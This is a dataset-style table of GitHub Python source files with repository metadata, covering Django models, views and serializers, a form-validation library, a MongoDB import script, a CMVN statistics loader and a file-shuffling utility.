blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f54412f85eb9a15ea9f8d417b06cf52653f0ab70 | afcad0132386caba80237f09280c649dd793f6db | /services/scraper/export.py | 284ab29423be231e7ec7defba1235d3742fe6e35 | [] | no_license | chimano/happy-bnb | 8b3bce7495a8dd8781cb6099b89b793f6feedf41 | e0ce7f8d4d1ae93746ebc01a3fe350c44602f5a5 | refs/heads/master | 2020-04-17T13:21:36.003284 | 2019-01-21T05:06:51 | 2019-01-21T05:09:21 | 166,612,324 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 778 | py | from sys import argv
from ast import literal_eval
import pymongo
URL_FORMAT = 'mongodb://{}/'
def categorize(entry):
return 'high' if float(entry[0]) > 4 else 'low'
if __name__ == '__main__':
if not argv or not len(argv) == 5:
print('Usage: python export.py HOST:PORT DATABASE COLLECTION IMPORT_FILE')
url, db, coll, import_file = argv[1:]
client = pymongo.MongoClient(URL_FORMAT.format(url))[db][coll]
with open(import_file, 'r') as file:
data = literal_eval(file.readlines()[0])
processed_data = [
{'rating': float(entry[0]),
'latitude': float(entry[1]),
'longitude': float(entry[2]),
'category': categorize(entry)}
for entry in data.values()
]
client.insert_many(processed_data)
| [
"lucas_turpin@hotmail.com"
] | lucas_turpin@hotmail.com |
30dbf2c9ddf45492b2c4906ac69c6fdaf6cf3b0c | 9547f82dc5a81bdc19ba5442d41518a81b518825 | /consecucion_traspaso/models.py | e3468724b015cae28f71774b7f879788abe68b5d | [] | no_license | luisfarfan/capacitacion | 12784f95564eda1dc38dc22aa518b99d4b315c75 | c93e4502476c02bb3755a68d84404453b2c2dd81 | refs/heads/master | 2021-01-11T04:17:15.476849 | 2017-02-14T01:13:27 | 2017-02-14T01:13:27 | 71,189,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,823 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class PersonalCapacitacion(models.Model):
id_per = models.IntegerField(primary_key=True)
dni = models.CharField(max_length=8, blank=True, null=True)
ape_paterno = models.CharField(max_length=100, blank=True, null=True, db_column='ape_paterno')
ape_materno = models.CharField(max_length=100, blank=True, null=True, db_column='ape_materno')
nombre = models.CharField(max_length=100, blank=True, null=True, db_column='nombre')
id_cargofuncional = models.IntegerField()
id_convocatoriacargo = models.IntegerField()
zona = models.CharField(max_length=5, blank=True, null=True)
contingencia = models.IntegerField(blank=True, null=True)
ubigeo = models.CharField(max_length=6)
class Meta:
managed = False
db_table = 'v_personal_capacitacion'
class MetaSeleccion(models.Model):
ccdd = models.CharField(max_length=2, blank=True, null=True)
ccpp = models.CharField(max_length=2, blank=True, null=True)
ccdi = models.CharField(max_length=2, blank=True, null=True)
ubigeo = models.CharField(max_length=6, blank=True, null=True)
id_convocatoriacargo = models.IntegerField()
id_cargofuncional = models.IntegerField()
meta = models.IntegerField()
class Meta:
managed = False
db_table = 'meta_seleccion'
# bandaprob
# 3 = ALTA
# 4 = BAJA
class Ficha177(models.Model):
id_per = models.IntegerField(primary_key=True)
id_convocatoriacargo = models.IntegerField()
capacita = models.IntegerField()
notacap = models.FloatField()
seleccionado = models.IntegerField()
sw_titu = models.IntegerField()
bandaprob = models.IntegerField()
class Meta:
managed = False
db_table = 'ficha_177'
| [
"lucho.farfan9@gmail.com"
] | lucho.farfan9@gmail.com |
f16bb51a8835137aba50c21bb060c677a7604e02 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_musses.py | b1ce3e681289e77be9498786f527b925bf9b01de | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py |
#calss header
class _MUSSES():
def __init__(self,):
self.name = "MUSSES"
self.definitions = muss
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['muss']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
fb1d4bb2df0be442fc7945067e0d14571cdc9dd6 | 6a1601d01e9ff7dbc6eeff9964ccdb8b182b5fb4 | /elections/views.py | a3698d33ae21468251a84b03523936788ab2908a | [] | no_license | Devourchoi/0902 | 41d55b41b16db467cd07693669c752fef3ba7436 | 9e63fc85cb9e4e9301c874dcdc8e6fed9a5e36e3 | refs/heads/master | 2022-12-16T23:15:00.625899 | 2020-09-05T00:56:20 | 2020-09-05T00:56:20 | 292,975,891 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 825 | py | from django.shortcuts import render
from django.http import HttpResponse
from .models import M1Question
def index(request):
m1questions = M1Question.objects.all()
context = {'m1questions':m1questions}
return render(request, 'elections/index.html', context)
def M1QDs(request, M1QD):
return HttpResponse(M1QD)
def vote(request):
m1questions = M1Question.objects.all()
selected_choice = request.POST['choice']
if selected_choice == "One":
M1Question.One = True
elif selected_choice == "Two":
M1Question.Two = True
elif selected_choice == "Three":
M1Question.Three = True
elif selected_choice == "Four":
M1Question.Four = True
elif selected_choice == "Five":
M1Question.Four = True
return HttpResponse(M1Question.Three) | [
"cih9144@naver.com"
] | cih9144@naver.com |
b49b688fcabbaedc2a8bfc477ba05c6aa46b4a66 | d4d3a649bd66315d8b273a6b473c5ed024d2e86e | /searchkeyws/serializers.py | 4fa9b6362347c0f2b20f43d056ccc963deaa30be | [] | no_license | Leanwit/gisiaws | 934e5ef4b3fd42346927847d44af17d219a51c77 | 8863bfcb03a00ee343968746a4f7902592d8099f | refs/heads/master | 2021-01-14T10:03:51.648179 | 2016-04-24T15:34:06 | 2016-04-24T15:34:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,263 | py | from rest_framework import serializers
from searchkeyws.models import *
class SearchKeySerializer(serializers.ModelSerializer):
class Meta:
model = SearchKey
fields = ('id', 'clave')
class SearchUrlSerializer(serializers.ModelSerializer):
class Meta:
model = SearchUrl
fields = ('url',)
class FilteredUrlSerializer(serializers.ModelSerializer):
class Meta:
model = FilteredUrl
fields = ('orden', 'url')
class SearchResultSerializer(serializers.ModelSerializer):
urls = SearchUrlSerializer(many=True)
class Meta:
model = SearchResult
fields = ('buscador', 'urls')
class WSRequestSerializer(serializers.ModelSerializer):
claves = SearchKeySerializer(many=True)
class Meta:
model = WSRequest
fields = ('id_proyecto', 'nombre_directorio', 'claves')
def create(self, validated_data):
claves = validated_data.pop('claves')
request = WSRequest.objects.create(**validated_data)
for key in claves:
SearchKey.objects.create(request=request, **key)
return request
class WSResponseSerializer(serializers.ModelSerializer):
buscadores = SearchResultSerializer(many=True)
class Meta:
model = WSResponse
fields = ('id_proyecto', 'buscadores')
def create(self, validated_data):
buscadores = validated_data.pop('buscadores')
wsreponse = WSResponse.objects.create(**validated_data)
for buscador in buscadores:
urls = buscador.pop('urls')
result = SearchResult.objects.create(response=wsreponse, **buscador)
for url in urls:
SearchUrl.objects.create(searchresult=result, **url)
return wsreponse
class WSFilteredUrlsRequestSerializer(serializers.ModelSerializer):
urls = FilteredUrlSerializer(many=True)
class Meta:
model = WSFilteredUrlsRequest
fields = ('id_proyecto', 'nombre_directorio', 'urls')
def create(self, validated_data):
urls = validated_data.pop('urls')
request = WSFilteredUrlsRequest.objects.create(**validated_data)
for url in urls:
FilteredUrl.objects.create(request=request, **url)
return request
| [
"luislezcair@gmail.com"
] | luislezcair@gmail.com |
256c5f55fe05774426ef35b4325026001409ec73 | b33c52cba0eb0bb2d205c7ccd0df4bc8bfe2eb97 | /laravalidation/validation.py | f2b79aa8d18c098391379e73de9526c1ee808cc2 | [
"MIT"
] | permissive | kristopherchun/laravalidation | 718cad923f8f9b6b6b03d2018fb415d27256ed3e | 2a68a0b132428759954dfed7404e45d3841f51b7 | refs/heads/master | 2020-05-20T00:40:35.291042 | 2019-05-07T18:33:57 | 2019-05-07T18:33:57 | 185,278,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,169 | py | import re
import datetime
import sys
import json
import os
class Validation():
# List to store the error messages in
response = {}
errors = {}
error_message_templates = {}
def validate(self, data, rules, custom_messages=None):
"""Validate the 'data' according to the 'rules' given, returns a list of errors named 'errors'"""
self.error_message_templates = json.loads('''{
"required": "The %s field is required.",
"required_if": "The %s field is required with.",
"confirmed": "The %s confirmation does not match.",
"max": "The %s may not be greater than %s characters.",
"min": "The %s must be at least %s characters.",
"email": "The %s must be a valid email address.",
"integer": "The %s must be an integer.",
"alpha": "The %s may only contain letters.",
"alpha_num": "The %s may only contain letters and numbers.",
"after": "'%s' is an invalid after date",
"before": "'%s' is an invalid before date ",
"between": "'%s' has an invalid value for between field",
"boolean": "'%s' has invalid value for boolean field",
"date": "'%s' value does not match date format",
"different": "'%s' has invalid value for same rule ",
"in": "'%s' has invalid value for in rule",
"ip": "'%s' must be a valid IP address",
"not_in": "'%s' has invalid value for not_in rule",
"present": "The data dictionary must have a nullable field name '%s'",
"phone": "'%s' must be a valid Phone Number",
"regex": "'%s' field does not match the RE ",
"same": "'%s' has invalid value for same rule",
"size": "'%s' has invalid value for size rule",
"website": "'%s' must be a valid Website URL",
"no_field": "No field named '%s' to validate for %s rule"
}''')
if not custom_messages:
self.custom_error_messages = json.loads('''{
"_comment": "You did not provide any field named <feld_name> in your data dictionary",
"field_name.rule":"You did not provide any field named field_name in your data dictionary",
"month_day.regex":"You did not provide any field named month_day in your data dictionary",
"phone.max":"You did not provide any field named phone in your data dictionary",
"month_day.required":"You did not provide any field named month_day in your data dictionary",
"new_password_confirmation.same":"You did not provide any field named new_password_confirmation in your data dictionary",
"phone.no_field":"You did not provide any field named phone in your data dictionary",
"birthday.date_format":"You did not provide any field named birthday in your data dictionary",
"new_password.alpha":"field new_password can only have alphabet values",
"host.no_field":"You did not provide any field named host in your data dictionary",
"email.no_field":"You did not provide any field named email in your data dictionary",
"nationality.no_field":"You did not provide any field named nationality in your data dictionary",
"active.no_field":"You did not provide any field named active in your data dictionary",
"age.no_field":"You did not provide any field named age in your data dictionary"
}''')
else:
self.custom_error_messages = custom_messages
# field_errors will keep the errors for a particular field, which will be appended to the main "errors" list
field_errors = {}
# iterate through the rules dictionary, fetching each rule name (dictionary key) one by one
for field_name in rules:
# fetch the rule (value of dictionary element) from "rules" dictionary for the current rule name (dictionary key) and split it to get a list
field_rules = rules[field_name].split('|')
# now looping through rules of one field one rule at a time with each iteration
for rule in field_rules:
# validate the data based on the rule assigned
if rule.startswith("after"):
field_error = self.__validate_after_date_fields(data, field_name, field_rules, rule)
elif rule == "alpha":
field_error = self.__validate_alpha_fields(data, field_name)
elif rule == "alpha_num":
field_error = self.__validate_alpha_num_fields(data, field_name)
elif rule.startswith("before"):
field_error = self.__validate_before_date_fields(data, field_name, field_rules, rule)
elif rule.startswith("between"):
field_error = self.__validate_between_fields(data, field_name, rule)
elif rule == "boolean":
field_error = self.__validate_boolean_fields(data, field_name)
elif rule.startswith("confirmed"):
field_error = self.__validate_confirmed_fields(data, field_name)
elif rule == "date":
field_error = self.__validate_date_fields(data, field_name, field_rules)
elif rule == "integer":
field_error = self.__validate_integer_fields(data, field_name)
elif rule.startswith("different"):
field_error = self.__validate_different_fields(data, field_name, rule)
elif rule == "email":
field_error = self.__validate_email_fields(data, field_name)
elif rule.startswith("in"):
field_error = self.__validate_in_fields(data, field_name, rule)
elif rule == "ip":
field_error = self.__validate_ip_fields(data, field_name)
elif rule.startswith("max"):
field_error = self.__validate_max_fields(data, field_name, rule)
elif rule.startswith("min"):
field_error = self.__validate_min_fields(data, field_name, rule)
elif rule.startswith("not_in"):
field_error = self.__validate_not_in_fields(data, field_name, rule)
elif rule == "present":
field_error = self.__validate_present_fields(data, field_name)
elif rule == "phone":
field_error = self.__validate_phone_fields(data, field_name)
elif rule.startswith("regex"):
field_error = self.__validate_regex_fields(data, field_name, rule)
elif rule == "required":
field_error = self.__validate_required_fields(data, field_name)
elif rule == "required_if":
field_error = self.__validate_required_if_fields(data, field_name)
elif rule.startswith("same"):
field_error = self.__validate_same_fields(data, field_name, rule)
elif rule.startswith("size"):
field_error = self.__validate_size_fields(data, field_name, rule)
elif rule == "website":
field_error = self.__validate_website_fields(data, field_name)
if field_error:
if field_name not in field_errors:
field_errors[field_name] = []
field_errors[field_name].extend(field_error)
if field_errors:
return field_errors
return {}
def __validate_required_fields(self, data, field_name):
"""Used for validating required fields, returns a list of error messages"""
errs = []
try:
if data[field_name] == '':
errs.append(self.return_field_message(field_name, "required"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'required'))
return errs
def __validate_required_if_fields(self, data, field_name):
"""Used for validating required fields, returns a list of error messages"""
errs = []
try:
if data[field_name] == '':
errs.append(self.return_field_message(field_name, "required_if"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'required_if'))
return errs
def __validate_date_fields(self, data, field_name, field_rules):
"""Used for validating date fields, returns a list of error messages"""
errs = []
date_format = self.retrieve_date_format(field_rules)
try:
datetime.datetime.strptime(data[field_name], date_format)
except ValueError:
errs.append(self.return_field_message(field_name, "date"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'date'))
return errs
def __validate_before_date_fields(self, data, field_name, field_rules, rule):
"""Used for validating fields for a date before the specified date value, returns a list of error messages"""
# retrieve the value for that before rule
before_date_value = rule.split(':')[1]
errs = []
date_format = self.retrieve_date_format(field_rules)
try:
date_entered = datetime.datetime.strptime(
data[field_name], date_format).date()
before_date = datetime.datetime.strptime(
before_date_value, date_format).date()
if date_entered >= before_date:
errs.append(self.return_field_message(field_name, "before"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'before'))
except ValueError:
# because the value will not be a valid date according to the format
errs.append(self.return_field_message(field_name, "date"))
return errs
def __validate_after_date_fields(self, data, field_name, field_rules, rule):
"""Used for validating fields for a date after the specified date value, returns a list of error messages"""
# retrieve the value for that after rule
after_date_value = rule.split(':')[1]
errs = []
date_format = self.retrieve_date_format(field_rules)
try:
date_entered = datetime.datetime.strptime(
data[field_name], date_format).date()
after_date = datetime.datetime.strptime(
after_date_value, date_format).date()
if date_entered <= after_date:
errs.append(self.return_field_message(field_name, "after"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'after date'))
except ValueError:
# because the value will not be a valid date according to the format
errs.append(self.return_field_message(field_name, "date"))
return errs
def __validate_integer_fields(self, data, field_name):
"""Used for validating integer fields, returns a list of error messages"""
errs = []
try:
if not data[field_name].isdigit():
errs.append(self.return_field_message(field_name, "integer"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'integer'))
return errs
def __validate_email_fields(self, data, field_name):
"""Used for validating email fields, returns a list of error messages"""
regex = r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"
errs, result = self.match_regular_expression(
regex, data[field_name], "website")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "email"))
return errs
def __validate_regex_fields(self, data, field_name, rule):
"""Used for validating field data to match a regular expression, returns a list of error messages"""
regex = str(rule.split(':')[1])
errs, result = self.match_regular_expression(
regex, data[field_name], "regex")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "regex"))
return errs
def __validate_present_fields(self, data, field_name):
"""Used for validating present fields, returns a list of error messages"""
errs = []
try:
if field_name in data:
errs.append(self.return_field_message(field_name, "present"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'present'))
return errs
def __validate_boolean_fields(self, data, field_name):
"""Used for validating boolean fields, returns a list of error messages"""
errs = []
bool_values = [1, 0, "1", "0", "false", "true", False, True]
try:
if data[field_name] not in bool_values:
errs.append(self.return_field_message(field_name, "boolean"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'boolean'))
return errs
def __validate_ip_fields(self, data, field_name):
"""Used for validating fields having IP Address, returns a list of error messages"""
regex = r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"
errs, result = self.match_regular_expression(
regex, data[field_name], "ip")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "ip"))
return errs
def __validate_phone_fields(self, data, field_name):
"""Used for validating fields having phone numbers, returns a list of error messages"""
regex = r'^(?:\+?93)?[07]\d{9,13}$'
errs, result = self.match_regular_expression(
regex, data[field_name], "phone")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "phone"))
return errs
def __validate_website_fields(self, data, field_name):
"""Used for validating fields having website addresses, returns a list of error messages"""
regex = r'(http(s)?://)?([\w-]+\.)+[\w-]+[\w-]+[\.]+[\.com]+([./?%&=]*)?'
errs, result = self.match_regular_expression(
regex, data[field_name], "website")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "website"))
return errs
def __validate_alpha_fields(self, data, field_name):
"""Used for validating fields for alphabets only, returns a list of error messages"""
errs = []
try:
if not data[field_name].isalpha():
errs.append(self.return_field_message(field_name, "alpha"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'alpha'))
return errs
def __validate_alpha_num_fields(self, data, field_name):
"""Used for validating fields for alphabets and numbers, returns a list of error messages"""
errs = []
try:
if not data[field_name].isalnum():
errs.append(self.return_field_message(field_name, "alpha_num"))
except KeyError:
errs.append(self.return_no_field_message(
field_name, 'alpha numeric'))
return errs
def __validate_max_fields(self, data, field_name, rule):
"""Used for validating fields for a maximum integer value, returns a list of error messages"""
# retrieve the value for that max rule
max_value = int(rule.split(':')[1])
errs = []
try:
if data[field_name].isdigit():
if int(data[field_name]) > max_value:
errs.append(self.return_field_message_with_value(field_name, max_value, "max"))
else:
if len(data[field_name]) > max_value:
errs.append(self.return_field_message_with_value(field_name, max_value, "max"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'maximum'))
return errs
def __validate_min_fields(self, data, field_name, rule):
"""Used for validating fields for a minimum integer value, returns a list of error messages"""
# retrieve the value for that min rule
min_value = int(rule.split(':')[1])
errs = []
try:
if data[field_name].isdigit():
if int(data[field_name]) < min_value:
errs.append(self.return_field_message_with_value(field_name, min_value, "min"))
else:
if len(data[field_name]) < min_value:
errs.append(self.return_field_message_with_value(field_name, min_value, "min"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'minimum'))
return errs
def __validate_confirmed_fields(self, data, field_name):
"""if the field under validation is a password, a matching password_confirmation field must be present in the data,
returns a list of error messages"""
errs = []
confirmation_field = field_name + "_confirmation"
try:
if confirmation_field not in data.keys():
errs.append(self.return_field_message(field_name, "confirmed"))
if data[field_name] != data[confirmation_field]:
errs.append(self.return_field_message(field_name, "confirmed"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'confirmed'))
return errs
def __validate_size_fields(self, data, field_name, rule):
"""Used for validating fields for a maximum number of characters in a string value, returns a list of error messages"""
errs = []
try:
# retrieve the value for that size rule
size_value = int(rule.split(':')[1])
if len(data[field_name]) >= size_value:
errs.append(self.return_field_message(field_name, "size"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'size'))
except ValueError:
errs.append(self.return_field_message(field_name, "size"))
return errs
def __validate_not_in_fields(self, data, field_name, rule):
"""Used for validating fields for some number of values to avoid, returns a list of error messages"""
# retrieve the value for that not_in rule
ls = rule.split(':')[1].split(',')
errs = []
try:
if data[field_name] in ls:
errs.append(self.return_field_message(field_name, 'not_in'))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'not_in'))
return errs
def __validate_in_fields(self, data, field_name, rule):
"""Used for validating fields for some number of values to allow, returns a list of error messages"""
# retrieve the value for that in rule
ls = rule.split(':')[1].split(',')
errs = []
try:
if data[field_name] not in ls:
errs.append(self.return_field_message(field_name, "in"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'in'))
return errs
def __validate_different_fields(self, data, field_name, rule):
"""Used for validating fields whose value should be different than the value of some other field, returns a list of error messages"""
# retrieve the value for the different rule
ls = rule.split(':')[1].split(',')[0]
errs = []
try:
if data[field_name] == data[ls]:
errs.append(self.return_field_message(field_name, "different"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'different'))
except Exception:
errs.append("Error Occured", sys.exc_info())
return errs
def __validate_same_fields(self, data, field_name, rule):
"""Used for validating fields whose value should be the same as some other field value, returns a list of error messages"""
# retrieve the value for the same rule
ls = rule.split(':')[1].split(',')
errs = []
try:
if data[field_name] != data[ls[0]]:
errs.append(self.return_field_message(field_name, "same"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'same'))
return errs
def __validate_between_fields(self, data, field_name, rule):
"""Used for validating fields for a number between two digits to allow, returns a list of error messages"""
# retrieve the value for the between rule
ls = rule.split(':')[1].split(',')
errs = []
try:
if int(data[field_name]) < int(ls[0]) or int(data[field_name]) > int(ls[1]):
errs.append(self.return_field_message(field_name, 'between'))
except KeyError:
errs.append(self.return_no_field_message(field_name, "between"))
except ValueError:
errs.append(field_name + " can not be empty")
return errs
def retrieve_date_format(self, field_rules):
# loop through each rule for the particular field to check if there is any date_format rule assigned
for rule in field_rules:
# if there is a date_format rule assigned then fetch the date format from that
if rule.startswith("date_format"):
df_format_index = field_rules.index(rule)
date_format = field_rules[df_format_index].split(":")[1]
return date_format
# if no date_format found, return the default date format
return '%m/%d/%Y'
def match_regular_expression(self, regex, field_name, rule_name):
comp_re = re.compile(regex, re.IGNORECASE)
errs = []
try:
result = comp_re.match(field_name)
except KeyError:
errs.append(self.return_no_field_message(field_name, rule_name))
result = "error"
return errs, result
def return_no_field_message(self, field_name, rule_name):
if field_name+".no_field" in self.custom_error_messages:
return self.custom_error_messages[field_name+".no_field"]
else:
return self.error_message_templates['no_field'] % (field_name, rule_name)
def return_field_message(self, field_name, rule_name):
if field_name+"."+rule_name in self.custom_error_messages:
return self.custom_error_messages[field_name+"."+rule_name]
else:
return self.error_message_templates[rule_name] % (field_name)
def return_field_message_with_value(self, field_name, value, rule_name):
if field_name+"."+rule_name in self.custom_error_messages:
return self.custom_error_messages[field_name+"."+rule_name]
else:
return self.error_message_templates[rule_name] % (field_name, value)
def is_valid(self, data, rules):
"""Validates the data according to the rules, returns True if the data is valid, and False if the data is invalid"""
errors = self.validate(data, rules)
if not errors:
return False
self.errors = errors
return not len(errors) > 0
| [
"kristopher.chun@dataq.ai"
] | kristopher.chun@dataq.ai |
f2f48e85360e44d5a3443a9845dae958b88ac7b3 | abf87dce5b4a0799a619a5b80b078536671bc4de | /wenet/utils/cmvn.py | d262143210dde2c73b7dabd67eba87ecdbc2a7b4 | [
"Apache-2.0"
] | permissive | fanlu/wenet | 0b784831a3cc741538c8e31680d6774163d55656 | 8c5f79449d4ab1bd31ed75814f1ea56050670a5d | refs/heads/main | 2023-07-09T07:30:00.817172 | 2021-08-23T10:36:58 | 2021-08-23T10:36:58 | 333,722,807 | 12 | 2 | Apache-2.0 | 2021-01-28T10:24:21 | 2021-01-28T10:24:20 | null | UTF-8 | Python | false | false | 2,991 | py | #!/usr/bin/env python3
# Copyright (c) 2020 Mobvoi Inc (Binbin Zhang)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import math
import numpy as np
def _load_json_cmvn(json_cmvn_file):
""" Load the json format cmvn stats file and calculate cmvn
Args:
json_cmvn_file: cmvn stats file in json format
Returns:
a numpy array of [means, vars]
"""
with open(json_cmvn_file) as f:
cmvn_stats = json.load(f)
means = cmvn_stats['mean_stat']
variance = cmvn_stats['var_stat']
count = cmvn_stats['frame_num']
for i in range(len(means)):
means[i] /= count
variance[i] = variance[i] / count - means[i] * means[i]
if variance[i] < 1.0e-20:
variance[i] = 1.0e-20
variance[i] = 1.0 / math.sqrt(variance[i])
cmvn = np.array([means, variance])
return cmvn
def _load_kaldi_cmvn(kaldi_cmvn_file):
""" Load the kaldi format cmvn stats file and calculate cmvn
Args:
kaldi_cmvn_file: kaldi text style global cmvn file, which
is generated by:
compute-cmvn-stats --binary=false scp:feats.scp global_cmvn
Returns:
a numpy array of [means, vars]
"""
means = []
variance = []
with open(kaldi_cmvn_file, 'r') as fid:
# kaldi binary file start with '\0B'
if fid.read(2) == '\0B':
logging.error('kaldi cmvn binary file is not supported, please '
'recompute it by: compute-cmvn-stats --binary=false '
' scp:feats.scp global_cmvn')
sys.exit(1)
fid.seek(0)
arr = fid.read().split()
assert (arr[0] == '[')
assert (arr[-2] == '0')
assert (arr[-1] == ']')
feat_dim = int((len(arr) - 2 - 2) / 2)
for i in range(1, feat_dim + 1):
means.append(float(arr[i]))
count = float(arr[feat_dim + 1])
for i in range(feat_dim + 2, 2 * feat_dim + 2):
variance.append(float(arr[i]))
for i in range(len(means)):
means[i] /= count
variance[i] = variance[i] / count - means[i] * means[i]
if variance[i] < 1.0e-20:
variance[i] = 1.0e-20
variance[i] = 1.0 / math.sqrt(variance[i])
cmvn = np.array([means, variance])
return cmvn
def load_cmvn(cmvn_file, is_json):
if is_json:
cmvn = _load_json_cmvn(cmvn_file)
else:
cmvn = _load_kaldi_cmvn(cmvn_file)
return cmvn[0], cmvn[1]
| [
"noreply@github.com"
] | noreply@github.com |
0c05978dfc7d7959566cd156f4599852862564c0 | 0745879ee221b431784478085ec17869fc8e87f1 | /if_else_control.py | 4d5c5ffbbb0c8e3526189d81f5c1f4a5ab510ea6 | [
"MIT"
] | permissive | joeysal/astr-119-hw-2 | 96c08c3330c4e96ce4a9d9284c2eaf897db28c1e | cb63f577370e5835c8ae027e624ad2459e71c3cb | refs/heads/main | 2022-12-26T00:26:57.474671 | 2020-10-11T23:16:09 | 2020-10-11T23:16:09 | 302,715,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | #define a subroutine
def flow_control(k):
#define a string based on the value of d
if(k==0):
s = "Variable k = %d equals 0." % k
elif(k==1):
s = "Variable k = %d equals 1." % k
else:
s = "Variable k = %d does not equal 0 or 1." % k
#print the variable
print(s)
#define a main function
def main():
#declare an integer
i = 0
#try flow_control for 0, 1, 2
flow_control(i)
i = 1
flow_control(i)
i = 2
flow_control(i)
#run the program
if __name__ == "__main__":
main() | [
"noreply@github.com"
] | noreply@github.com |
fa254f89e3eb04376c18b0fd50454b35cf755972 | 1ba0a95bc4369a581c7c42a1ee076768149cd201 | /shuffle_file.py | 805b085a4c3e1990c12c72ca84f1fc932f05b0a6 | [] | no_license | bhorkar/kaggle_ctr | 29122ceaa9cae0bdd9c65464bf833e7ab2f1808c | 6dc2bf413fb1bc9605462159728ad766c76b925e | refs/heads/master | 2021-01-19T08:10:38.570563 | 2014-12-24T15:06:31 | 2014-12-24T15:06:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,381 | py |
def shuffle_file(path, buff=10000000, has_header=True):
import random
from datetime import datetime
start = datetime.now()
header = ''
with open(path) as f:
for linecount, line in enumerate(f):
if linecount == 0 and has_header:
header = line
f.close()
if has_header:
linecount -= 1
print 'Found ' + str(linecount) + ' lines'
shuffled = range(linecount+1)
random.shuffle(shuffled)
with open(path + '.shuffled', 'a') as fw:
if has_header:
fw.write(header)
for k in range(len(shuffled)/buff+1):
print '...processing from line ' + str(k*buff) + ' to line ' + str((k+1)*buff-1)
segment = shuffled[k*buff:(k+1)*buff]
segment_set = set(segment) # for quicker lookup
db = {}
with open(path) as fr:
for j, line in enumerate(fr):
if has_header:
if j == 0:
continue
j -= 1
if j in segment_set:
db[str(j)] = line
fr.close()
for i in segment:
fw.write(db[str(i)])
fw.close()
print 'Elapsed: ' + str(datetime.now() - start)
if __name__ == "__main__":
shuffle_file('train') | [
"abhijeet.bhorkar@gmail.com"
] | abhijeet.bhorkar@gmail.com |
81393b9d2b45da22c82c2041e6d293d0eea36740 | eb5663b38eb39e80bdb8291c445c7bb14dfcebff | /ipl/ipl/apps/matches/migrations/0005_auto_20191102_1208.py | 6dd442ae775c93ce3f8d9fe9ce9294ec561cae05 | [] | no_license | aadil-reckonsys/ipl-statistics | d8e04b320f89fc6cefc6997334beba8453ee4ba2 | fc59268bfc1e3330aa49125a2d5fe010d34645a9 | refs/heads/master | 2020-09-03T07:40:50.906479 | 2019-11-04T04:41:33 | 2019-11-04T04:41:33 | 219,418,756 | 1 | 0 | null | 2019-11-04T04:42:34 | 2019-11-04T04:42:34 | null | UTF-8 | Python | false | false | 381 | py | # Generated by Django 2.2.6 on 2019-11-02 12:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('matches', '0004_auto_20191102_1206'),
]
operations = [
migrations.RenameField(
model_name='delivery',
old_name='dismissed_kind',
new_name='dismissal_kind',
),
]
| [
"aadil@reckonsys.com"
] | aadil@reckonsys.com |
